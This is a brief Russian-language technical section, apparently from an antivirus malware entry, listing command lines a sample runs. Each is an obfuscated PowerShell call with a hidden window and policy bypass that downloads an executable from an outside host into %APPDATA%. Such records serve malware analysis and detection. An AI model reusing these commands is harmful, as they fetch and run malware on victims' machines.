Техническая информация
- '<SYSTEM32>\cmd.exe' /c pOwErShelL -EX bypASS -NoP -w HiddEn INvokE-WebrEqUESt -UrI 'https://mine.yubarajshrestha.info.np/vnxwcry.exe' -OutfiLe '%apPDaTA%\ad...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EX bypASS -NoP -w HiddEn INvokE-WebrEqUESt -UrI 'https://mine.yubarajshrestha.info.np/vnxwcry.exe' -OutfiLe '%APPDATA%\admnt.exe' ; ...
- '<SYSTEM32>\cmd.exe' /c pOwErShelL -EX bypASS -NoP -w HiddEn INvokE-WebrEqUESt -UrI 'https://mine.yubarajshrestha.info.np/vnxwcry.exe' -OutfiLe '%apPDaTA%\ad... (со скрытым окном)